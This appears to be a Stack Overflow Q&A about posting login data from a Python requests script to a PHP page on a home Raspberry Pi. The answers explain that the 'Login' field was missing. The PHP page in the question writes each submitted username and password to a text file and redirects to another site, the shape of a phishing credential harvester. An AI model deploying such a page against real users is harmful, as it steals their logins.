# Python 3 - Script to Send Credentials to PHP page

Tags: php, python-3.x

I wanted to try sending login details from a Python script to a web page which requires a username and password to access the main site.

I have set up a test environment by installing Apache server with PHP onto my Raspberry Pi.

I searched Stack Overflow and found the following script from user called Genetics:

login.html

```
<form action="login.php" method="post">
<input type="text" id="username" name="username"/>
<input type="password" id="password" name="password"/>
<input type="submit" name="Login" value="Login">
</form>
```

login.php

```
<html>
 <head>
  <title>Login</title>
 </head>
 <body>

<?php

//If Submit Button Is Clicked Do the Following
if ($_POST['Login']){

$myFile = "log.txt";
$fh = fopen($myFile, 'a') or die("can't open file");
$stringData = $_POST['username'] . ":";
fwrite($fh, $stringData);
$stringData = $_POST['password'] . "\n";
fwrite($fh, $stringData);
fclose($fh);

} ?>


//goes here after
<script>location.href='https://YOURWEBSITE.com';</script>

 </body>
</html>
```

I have created these files on the Pi in the /var/www/html directory along with a log.txt file. When details are entered into the login.html page they are saved to the log.txt file and all works as expected.

What I wanted to do is run a Python 3 script to enter these details in without actually having to access the page through a browser. After a bit more digging, I found the following script and changed it to access the php page on the Pi:

```
import requests

url = 'http://192.168.0.23/login.php'
username = 'admin'
password = 'letmein'
r = requests.post(url, allow_redirects=False, data={
    'username': username,
    'password': password
    })
```

I run the script and it does not show any errors but the login credentials in the script do not get written in the log.txt file.

This is the header file for the php page:

```
General:
Request URL: http://192.168.0.23/login.php
Request Method: POST
Status Code: 200 OK
Remote Address: 192.168.0.23:80
Referrer Policy: no-referrer-when-downgrade

Response Headers:
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 135
Content-Type: text/html; charset=UTF-8
Date: Sat, 10 Nov 2018 22:01:13 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.10 (Raspbian)
Vary: Accept-Encoding

Request Headers:
POST /login.php HTTP/1.1
Host: 192.168.0.23
Connection: keep-alive
Content-Length: 41
Cache-Control: max-age=0
Origin: http://192.168.0.23
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,
image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.0.23/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Form Data:
username: admin
password: letmein
Login: Login
```

Can anyone help and show me how to get this to work as I expect it to?

Any help much appreciatted.

Comment: Hi, maybe change the URL to `url = 'http://127.0.0.1/login.php'`?

Comment: 127.0.0.1 just gives me a big bunch of errors. I am not running the python script on the Pi. I am running it from a seperate Win7 laptop. 192.168.0.23 is the correct address for my Pi on my network.

Answer (score 0, accepted):

As you're expecting `$_POST['Login']` to be set for triggering your code, you'll have to provide a value to make it works. Add `'Login': true` into your `requests.post` `data` and ti will work great.

Comment: Thanks, the penny just dropped on how to trigger the code :)

Comment: I posted my solution before you provided your answer

Comment: My pleasure ;) Next time I would try to be faster hehehe

Answer (score 0):

After much trying and failing, it turns out the issue was I was sending a username and password but no parameter for the login button.

The correct code is:

```
import requests

url = 'http://192.168.0.23/login.php'
username = 'admin'
password = 'letmein'
Login = 'Login'
r = requests.post(url, allow_redirects=False, data={
    'username': username,
    'password': password,
    'Login': Login
    })
```

And a second solution:

```
import requests
headers = {'User-Agent': 'Mozilla/5.0'}
payload = {'username':'Admin','password':'Letmein','Login':'Login'}

session = requests.Session()
session.post('http://192.168.0.23/login.php',headers=headers,data=payload)
```